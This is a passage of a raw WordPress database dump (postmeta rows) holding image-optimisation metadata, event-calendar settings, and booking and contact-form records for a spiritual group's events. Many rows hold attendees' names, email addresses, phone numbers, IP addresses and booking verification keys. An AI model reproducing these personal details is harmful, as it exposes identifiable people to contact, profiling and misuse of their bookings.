\";a:5:{s:4:\"file\";s:20:\"ocean-3-1536x962.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:962;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:254784;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168744,267060,'original-file','2022/08/harold-10-updraft-pre-smush-original.jpg'),(168745,267060,'smush-complete','1'),(168746,267060,'smush-info','The file was compressed from 26.86 KB to 25.47 KB saving 5.15 percent using WP-Optimize'),(168747,267060,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:27502;s:12:\"smushed-size\";i:26085;s:15:\"savings-percent\";d:5.15;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:27502;s:10:\"compressed\";i:26085;}s:6:\"medium\";a:2:{s:8:\"original\";i:21396;s:10:\"compressed\";i:20841;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7640;s:10:\"compressed\";i:7574;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:24955;s:10:\"compressed\";i:24142;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:21915;s:10:\"compressed\";i:21214;}}}'),(168748,267104,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/08/BrightLight.webp - cannot be optimized, it has an invalid file type'),(168749,267104,'smush-complete',''),(168750,267117,'original-file','2022/09/ocean-3-updraft-pre-smush-original.jpg'),(168751,267117,'smush-complete','1'),(168752,267117,'smush-info','The file was compressed from 314.19 KB to 305.40 KB saving 2.8 percent using WP-Optimize'),(168753,267117,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:321726;s:12:\"smushed-size\";i:312725;s:15:\"savings-percent\";d:2.8;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:321726;s:10:\"compressed\";i:312725;}s:6:\"medium\";a:2:{s:8:\"original\";i:14334;s:10:\"compressed\";i:14334;}s:5:\"large\";a:2:{s:8:\"original\";i:126929;s:10:\"compressed\";i:126058;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6138;s:10:\"compressed\";i:6072;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:76294;s:10:\"compressed\";i:75903;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20848;s:10:\"compressed\";i:20848;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:34596;s:10:\"compressed\";i:34596;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:23770;s:10:\"compressed\";i:23770;}s:8:\"tileview\";a:2:{s:8:\"original\";i:25807;s:10:\"compressed\";i:25807;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:254784;s:10:\"compressed\";i:253443;}}}'),(195866,269410,'_field_651','(970) 313-3786'),(195865,269410,'_field_653','toyisylvie4@gmail.com'),(195864,269410,'_field_652','Toyi'),(195863,269410,'_field_654','Sylvie '),(195862,269409,'_wp_trash_meta_time','1700514102'),(195861,269409,'_wp_trash_meta_status','publish'),(191595,269027,'mec_book_date_submit','20230909230504'),(191594,269027,'mec_attention_time_end','1694345400'),(191592,269027,'mec_attention_time','1694341800:1694345400'),(191593,269027,'mec_attention_time_start','1694341800'),(191591,269027,'mec_other_dates','a:0:{}'),(191590,269027,'mec_all_dates','a:0:{}'),(169242,267189,'mec_transaction_id','PAV22929'),(168783,267131,'mec_transaction_id','DCT33560'),(168784,267131,'mec_user_id','1000043'),(168785,267131,'mec_verified','1'),(168786,267131,'mec_verification_key','ff0590c7ff56e2b40f0515a77a7d616a'),(168787,267131,'mec_cancellation_key','514f106a4fe8f55b35b90c2374446880'),(168788,267131,'mec_confirmed','1'),(168789,267131,'mec_event_id','267041'),(168790,267131,'mec_date','1662287400:1662291000'),(168791,267131,'mec_ticket_id',',1,'),(168792,267131,'mec_booking_time','2022-09-03 23:16:12'),(168793,267131,'mec_all_dates','a:0:{}'),(168794,267131,'mec_other_dates','a:0:{}'),(168795,267131,'mec_attention_time','1662287400:1662291000'),(168796,267131,'mec_attention_time_start','1662287400'),(168797,267131,'mec_attention_time_end','1662291000'),(168798,267131,'mec_book_date_submit','20220903231612'),(168799,267131,'mec_booking_location','118'),(168800,267131,'mec_ticket_price_1','0'),(168801,267131,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:14:\"Gordon Garland\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"75.71.185.58\";}}'),(168802,267131,'mec_price','0'),(168803,267131,'mec_gateway','MEC_gateway_free'),(168804,267131,'mec_gateway_label','Free'),(168805,267132,'mec_transaction_id','TUN63374'),(168806,267132,'mec_user_id','1000045'),(168807,267132,'mec_verified','1'),(168808,267132,'mec_verification_key','7f05ebba2b9f2a72dc538fda31a99445'),(168809,267132,'mec_cancellation_key','debe8e5336266f0da6da0cad6a081a69'),(168810,267132,'mec_confirmed','1'),(168811,267132,'mec_event_id','267041'),(168812,267132,'mec_date','1662287400:1662291000'),(168813,267132,'mec_ticket_id',',1,'),(168814,267132,'mec_booking_time','2022-09-03 23:44:22'),(168815,267132,'mec_all_dates','a:0:{}'),(168816,267132,'mec_other_dates','a:0:{}'),(168817,267132,'mec_attention_time','1662287400:1662291000'),(168818,267132,'mec_attention_time_start','1662287400'),(168819,267132,'mec_attention_time_end','1662291000'),(168820,267132,'mec_book_date_submit','20220903234422'),(168821,267132,'mec_booking_location','118'),(168822,267132,'mec_ticket_price_1','0'),(168823,267132,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:13:\"kelik0@me.com\";s:4:\"name\";s:13:\"Keli Kinsella\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.183.217\";}}'),(168824,267132,'mec_price','0'),(168825,267132,'mec_gateway','MEC_gateway_free'),(168826,267132,'mec_gateway_label','Free'),(168827,267133,'mec_transaction_id','YHT98148'),(168828,267133,'mec_user_id','1000015'),(168829,267133,'mec_verified','1'),(168830,267133,'mec_verification_key','7db4b20345f2f70e17262116c119b14a'),(168831,267133,'mec_cancellation_key','20eb69ab4684932a94adf558aad293d9'),(168832,267133,'mec_confirmed','1'),(168833,267133,'mec_event_id','266611'),(168834,267133,'mec_date','1663700400:1663704000'),(168835,267133,'mec_ticket_id',',1,'),(168836,267133,'mec_booking_time','2022-09-04 07:10:59'),(168837,267133,'mec_all_dates','a:0:{}'),(168838,267133,'mec_other_dates','a:0:{}'),(168839,267133,'mec_attention_time','1663700400:1663704000'),(168840,267133,'mec_attention_time_start','1663700400'),(168841,267133,'mec_attention_time_end','1663704000'),(168842,267133,'mec_book_date_submit','20220904071059'),(168843,267133,'mec_booking_location','144'),(168844,267133,'mec_ticket_price_1','0'),(168845,267133,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"47.35.179.159\";}}'),(168846,267133,'mec_price','0'),(168847,267133,'mec_gateway','MEC_gateway_free'),(168848,267133,'mec_gateway_label','Free'),(168861,247330,'_wp_old_date','2022-06-01'),(168863,247336,'_wp_old_date','2022-06-01'),(168865,265030,'_wp_old_date','2022-06-01'),(168867,264903,'_wp_old_date','2022-06-01'),(168869,264902,'_wp_old_date','2022-06-01'),(168871,264901,'_wp_old_date','2022-06-01'),(168877,247342,'_wp_old_date','2022-06-01'),(168879,261921,'_wp_old_date','2022-06-01'),(168881,247343,'_wp_old_date','2022-06-01'),(168883,247344,'_wp_old_date','2022-06-01'),(168887,247345,'_wp_old_date','2022-06-01'),(177197,267954,'mec_attention_time_start','1676197800'),(177198,267954,'mec_attention_time_end','1676244600'),(168897,247332,'_wp_old_date','2022-06-01'),(168899,266761,'_wp_old_date','2022-06-01'),(168901,266281,'_wp_old_date','2022-06-01'),(179385,268208,'mec_end_time_ampm','PM'),(168965,68102,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(170791,267309,'mec_more_info_title',''),(170790,267309,'mec_more_info',''),(170789,267309,'mec_read_more',''),(170787,267309,'mec_dont_show_map','0'),(170788,267309,'mec_organizer_id','1'),(170786,267309,'mec_location_id','118'),(170784,267309,'protect_children',''),(170785,267309,'mec_color',''),(170797,267309,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-19\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-19\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(170796,267309,'mec_additional_location_ids','a:0:{}'),(170795,267309,'mec_additional_organizer_ids','a:0:{}'),(194015,269256,'_field_654','Michelle'),(170799,267309,'mec_certain_weekdays','a:0:{}'),(170798,267309,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(170810,267309,'mec_start_time_minutes','0'),(170801,267309,'one_occurrence','0'),(170800,267309,'mec_allday','0'),(170794,267309,'mec_currency','a:0:{}'),(170793,267309,'mec_cost',''),(170792,267309,'mec_more_info_target','_self'),(169226,267187,'_field_224','Paige'),(169227,267187,'_field_225','Miller'),(169228,267187,'_field_226','paigewmiller@gmail.com'),(169229,267187,'_field_227','CO'),(169230,267187,'_field_228','US'),(169231,267187,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(169232,267187,'_form_id','21'),(169233,267187,'_seq_num','156'),(194009,269254,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom'),(194007,269254,'_field_653','insightsunlimited@icloud.com'),(194008,269254,'_field_651','(970) 846-6688'),(194006,269254,'_field_652','Finnoff'),(194004,269253,'_seq_num','92'),(169243,267189,'mec_user_id','1000026'),(169244,267189,'mec_verified','1'),(169245,267189,'mec_verification_key','831bfa6de02e79d92104254be656ef02'),(169246,267189,'mec_cancellation_key','2d9c29ae6213ee4fd9407718e68905d7'),(169247,267189,'mec_confirmed','1'),(169248,267189,'mec_event_id','267044'),(169249,267189,'mec_date','1662892200:1662895800'),(169250,267189,'mec_ticket_id',',1,'),(169251,267189,'mec_booking_time','2022-09-10 18:25:07'),(169252,267189,'mec_all_dates','a:0:{}'),(169253,267189,'mec_other_dates','a:0:{}'),(169254,267189,'mec_attention_time','1662892200:1662895800'),(169255,267189,'mec_attention_time_start','1662892200'),(169256,267189,'mec_attention_time_end','1662895800'),(169257,267189,'mec_book_date_submit','20220910182507'),(169258,267189,'mec_booking_location','129'),(169259,267189,'mec_ticket_price_1','0'),(169260,267189,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:11:\"Tom Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"69.144.1.211\";}}'),(169261,267189,'mec_price','0'),(169262,267189,'mec_gateway','MEC_gateway_free'),(169263,267189,'mec_gateway_label','Free'),(169264,267190,'_field_450','Paige'),(169265,267190,'_field_451','Miller'),(169266,267190,'_field_458','4436130455'),(169267,267190,'_field_452','paigewmiller@gmail.com'),(169268,267190,'_field_453','Visiting temple and/or talking to someone'),(169269,267190,'_field_454','I am very much interested in speaking to someone about becoming a member/student, and visiting the facility possibly if that is possible. Thank you\nPaige miller'),(169270,267190,'_form_id','49'),(169271,267190,'_seq_num','8'),(169272,267191,'mec_transaction_id','GWX12508'),(169273,267191,'mec_user_id','1000023'),(169274,267191,'mec_verified','1'),(169275,267191,'mec_verification_key','2e3c049f7ef57517a9be67d0169381c8'),(169276,267191,'mec_cancellation_key','ada0cc7e7e9d49cd4fc48b2ae57596ff'),(169277,267191,'mec_confirmed','1'),(169278,267191,'mec_event_id','267044'),(169279,267191,'mec_date','1662892200:1662895800'),(169280,267191,'mec_ticket_id',',1,'),(169281,267191,'mec_booking_time','2022-09-10 20:49:20'),(169282,267191,'mec_all_dates','a:0:{}'),(169283,267191,'mec_other_dates','a:0:{}'),(169284,267191,'mec_attention_time','1662892200:1662895800'),(169285,267191,'mec_attention_time_start','1662892200'),(169286,267191,'mec_attention_time_end','1662895800'),(169287,267191,'mec_book_date_submit','20220910204920'),(169288,267191,'mec_booking_location','129'),(169289,267191,'mec_ticket_price_1','0'),(169290,267191,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:8:\"Bonnie G\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"172.58.136.193\";}}'),(169291,267191,'mec_price','0'),(169292,267191,'mec_gateway','MEC_gateway_free'),(169293,267191,'mec_gateway_label','Free'),(169294,267192,'mec_transaction_id','JUN71113'),(169295,267192,'mec_user_id','1000026'),(169296,267192,'mec_verified','1'),(169297,267192,'mec_verification_key','3a9c7e6ea20b9106a55a53c44d46df8a'),(169298,267192,'mec_cancellation_key','483a3afa1c3d4f4c924ea77f743df5e8'),(169299,267192,'mec_confirmed','1'),(169300,267192,'mec_event_id','267044'),(169301,267192,'mec_date','1662892200:1662895800'),(169302,267192,'mec_ticket_id',',1,'),(169303,267192,'mec_booking_time','2022-09-11 10:16:06'),(169304,267192,'mec_all_dates','a:0:{}'),(169305,267192,'mec_other_dates','a:0:{}'),(169306,267192,'mec_attention_time','1662892200:1662895800'),(169307,267192,'mec_attention_time_start','1662892200'),(169308,267192,'mec_attention_time_end','1662895800'),(169309,267192,'mec_book_date_submit','20220911101606'),(169310,267192,'mec_booking_location','129'),(169311,267192,'mec_ticket_price_1','0'),(169312,267192,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:10:\"Tom walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"69.144.1.211\";}}'),(169313,267192,'mec_price','0'),(169314,267192,'mec_gateway','MEC_gateway_free'),(169315,267192,'mec_gateway_label','Free'),(169316,267193,'mec_transaction_id','TRL39941'),(169317,267193,'mec_user_id','1000022'),(169318,267193,'mec_verified','1'),(169319,267193,'mec_verification_key','5976817d2f06fbd1886af22acf40239c'),(169320,267193,'mec_cancellation_key','89d4ff522abc217b97a5bb350bcc2bd6'),(169321,267193,'mec_confirmed','1'),(169322,267193,'mec_event_id','267044'),(169323,267193,'mec_date','1662892200:1662895800'),(169324,267193,'mec_ticket_id',',1,'),(169325,267193,'mec_booking_time','2022-09-11 10:20:44'),(169326,267193,'mec_all_dates','a:0:{}'),(169327,267193,'mec_other_dates','a:0:{}'),(169328,267193,'mec_attention_time','1662892200:1662895800'),(169329,267193,'mec_attention_time_start','1662892200'),(169330,267193,'mec_attention_time_end','1662895800'),(169331,267193,'mec_book_date_submit','20220911102044'),(169332,267193,'mec_booking_location','129'),(169333,267193,'mec_ticket_price_1','0'),(169334,267193,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"67.186.217.18\";}}'),(169335,267193,'mec_price','0'),(169336,267193,'mec_gateway','MEC_gateway_free'),(169337,267193,'mec_gateway_label','Free'),(169338,267194,'mec_transaction_id','KLB99384'),(169339,267194,'mec_user_id','1000046'),(169340,267194,'mec_verified','1'),(169341,267194,'mec_verification_key','982c57f1f2380461ba69f7e77a244dfe'),(169342,267194,'mec_cancellation_key','9ee2b8c458247b368230724061e53e70'),(169343,267194,'mec_confirmed','1'),(169344,267194,'mec_event_id','267044'),(169345,267194,'mec_date','1662892200:1662895800'),(169346,267194,'mec_ticket_id',',1,'),(169347,267194,'mec_booking_time','2022-09-11 10:26:10'),(169348,267194,'mec_all_dates','a:0:{}'),(169349,267194,'mec_other_dates','a:0:{}'),(169350,267194,'mec_attention_time','1662892200:1662895800'),(169351,267194,'mec_attention_time_start','1662892200'),(169352,267194,'mec_attention_time_end','1662895800'),(169353,267194,'mec_book_date_submit','20220911102610'),(169354,267194,'mec_booking_location','129'),(169355,267194,'mec_ticket_price_1','0'),(169356,267194,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"pennycole57@gmail.com\";s:4:\"name\";s:5:\"Penny\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"65.130.208.81\";}}'),(169357,267194,'mec_price','0'),(169358,267194,'mec_gateway','MEC_gateway_free'),(169359,267194,'mec_gateway_label','Free'),(169360,267195,'mec_transaction_id','SXK40420'),(169361,267195,'mec_user_id','1000047'),(169362,267195,'mec_verified','1'),(169363,267195,'mec_verification_key','0bcd18b413c9fed912bf6e97d6f9a48f'),(169364,267195,'mec_cancellation_key','8fc7165b6484f028de6e4f9f4b353a21'),(169365,267195,'mec_confirmed','1'),(169366,267195,'mec_event_id','267044'),(169367,267195,'mec_date','1662892200:1662895800'),(169368,267195,'mec_ticket_id',',1,'),(169369,267195,'mec_booking_time','2022-09-11 10:42:11'),(169370,267195,'mec_all_dates','a:0:{}'),(169371,267195,'mec_other_dates','a:0:{}'),(169372,267195,'mec_attention_time','1662892200:1662895800'),(169373,267195,'mec_attention_time_start','1662892200'),(169374,267195,'mec_attention_time_end','1662895800'),(169375,267195,'mec_book_date_submit','20220911104211'),(169376,267195,'mec_booking_location','129'),(169377,267195,'mec_ticket_price_1','0'),(169378,267195,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:7:\"Frances\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"207.109.54.133\";}}'),(169379,267195,'mec_price','0'),(169380,267195,'mec_gateway','MEC_gateway_free'),(169381,267195,'mec_gateway_label','Free'),(169382,267196,'_field_179','Cody '),(169383,267196,'_field_180','East '),(169384,267196,'_field_181','Coworker60@q.com'),(169385,267196,'_field_182','CO'),(169386,267196,'_field_183','US'),(169387,267196,'_field_184','a:1:{i:0;s:8:\"Loveland\";}'),(169388,267196,'_form_id','17'),(169389,267196,'_seq_num','11'),(194005,269254,'_field_654','Zoe'),(194003,269253,'_form_id','61'),(194002,269253,'_field_649','Jack called &amp; was SO HELPFUL!\nNow I’m guessing a book will arrive soon?'),(194001,269253,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom'),(194000,269253,'_field_651','(970) 215-8543'),(193999,269253,'_field_653','molliesch@gmail.com'),(193998,269253,'_field_652','Schlesser'),(193997,269253,'_field_654','Mollie'),(193993,269252,'_seq_num','91'),(193992,269252,'_form_id','61'),(193991,269252,'_field_649',''),(193990,269252,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom'),(193989,269252,'_field_651','(970) 749-8356'),(193985,269251,'_seq_num','90'),(169416,267201,'original-file','2022/09/unsplash-wave-surfer-1-updraft-pre-smush-original.jpg'),(169417,267201,'smush-complete','1'),(169418,267201,'smush-info','The file was compressed from 446.15 KB to 446.15 KB saving 0 percent using WP-Optimize'),(169419,267201,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:456858;s:12:\"smushed-size\";i:456858;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:456858;s:10:\"compressed\";i:456858;}s:6:\"medium\";a:2:{s:8:\"original\";i:11131;s:10:\"compressed\";i:10622;}s:5:\"large\";a:2:{s:8:\"original\";i:107731;s:10:\"compressed\";i:105061;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5100;s:10:\"compressed\";i:4558;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:60602;s:10:\"compressed\";i:59046;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16298;s:10:\"compressed\";i:15715;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:28370;s:10:\"compressed\";i:27519;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19550;s:10:\"compressed\";i:18838;}s:8:\"tileview\";a:2:{s:8:\"original\";i:20667;s:10:\"compressed\";i:20023;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:236729;s:10:\"compressed\";i:232730;}}}'),(193986,269252,'_field_654','Catherine'),(193987,269252,'_field_652','Lambert'),(193988,269252,'_field_653','firstborncannon@gmail.com'),(193976,269250,'_form_id','61'),(169433,267207,'protect_children',''),(169434,267207,'mec_color',''),(169435,267207,'mec_location_id','118'),(169436,267207,'mec_dont_show_map','0'),(169437,267207,'mec_organizer_id','1'),(169438,267207,'mec_read_more',''),(169439,267207,'mec_more_info',''),(169440,267207,'mec_more_info_title',''),(169441,267207,'mec_more_info_target','_self'),(169442,267207,'mec_cost',''),(169443,267207,'mec_currency','a:0:{}'),(169444,267207,'mec_additional_organizer_ids','a:0:{}'),(169445,267207,'mec_additional_location_ids','a:0:{}'),(169446,267207,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-15\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-15\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(169447,267207,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(169448,267207,'mec_certain_weekdays','a:0:{}'),(169449,267207,'mec_allday','0'),(169450,267207,'one_occurrence','0'),(169451,267207,'mec_hide_time','0'),(169452,267207,'mec_hide_end_time','0'),(169453,267207,'mec_comment',''),(169454,267207,'mec_timezone','global'),(169455,267207,'mec_countdown_method','global'),(169456,267207,'mec_public','1'),(169457,267207,'mec_start_date','2022-10-15'),(169458,267207,'mec_start_time_hour','1'),(169459,267207,'mec_start_time_minutes','0'),(169460,267207,'mec_start_time_ampm','PM'),(169461,267207,'mec_start_day_seconds','46800'),(169462,267207,'mec_end_date','2022-10-15'),(169463,267207,'mec_end_time_hour','2'),(169464,267207,'mec_end_time_minutes','0'),(169465,267207,'mec_end_time_ampm','PM'),(169466,267207,'mec_end_day_seconds','50400'),(169467,267207,'mec_repeat_status','0'),(169468,267207,'mec_repeat_type',''),(169469,267207,'mec_repeat_interval','1'),(169470,267207,'mec_repeat_end',''),(169471,267207,'mec_repeat_end_at_occurrences',''),(169472,267207,'mec_repeat_end_at_date',''),(169473,267207,'mec_advanced_days','a:0:{}'),(169474,267207,'mec_in_days',''),(169475,267207,'mec_not_in_days',''),(169476,267207,'mec_hourly_schedules','a:0:{}'),(169477,267207,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169478,267207,'mec_tickets','a:0:{}'),(169479,267207,'mec_fees_global_inheritance','1'),(169480,267207,'mec_fees','a:0:{}'),(169481,267207,'mec_ticket_variations_global_inheritance','1'),(169482,267207,'mec_ticket_variations','a:0:{}'),(169483,267207,'mec_reg_fields_global_inheritance','1'),(169484,267207,'mec_reg_fields','a:0:{}'),(169485,267207,'mec_bfixed_fields','a:0:{}'),(169486,267207,'mec_op','a:0:{}'),(169487,267207,'mec_fields','a:0:{}'),(169488,267207,'mec_event_status','EventScheduled'),(169489,267207,'mec_moved_online_link',''),(169490,267207,'mec_cancelled_reason',''),(169491,267207,'mec_display_cancellation_reason_in_single_page',''),(169492,267207,'boldgrid_hide_page_title','0'),(169493,267207,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(169494,267207,'passster_activate_global_protection',NULL),(169495,267207,'passster_activate_protection',NULL),(169496,267207,'passster_protection_type','password'),(169499,267207,'_dp_original','266104'),(169498,267207,'boldgrid_in_page_containers','1'),(169500,267207,'_edit_lock','1663086946:2'),(169501,267207,'_edit_last','2'),(169502,267208,'_wp_attached_file','2022/09/golden-heart-2.jpg'),(169503,267208,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:739;s:6:\"height\";i:416;s:4:\"file\";s:26:\"2022/09/golden-heart-2.jpg\";s:8:\"filesize\";i:40371;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"golden-heart-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9269;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"golden-heart-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5335;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"golden-heart-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14124;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"golden-heart-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20900;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"golden-heart-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15386;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"golden-heart-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16799;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s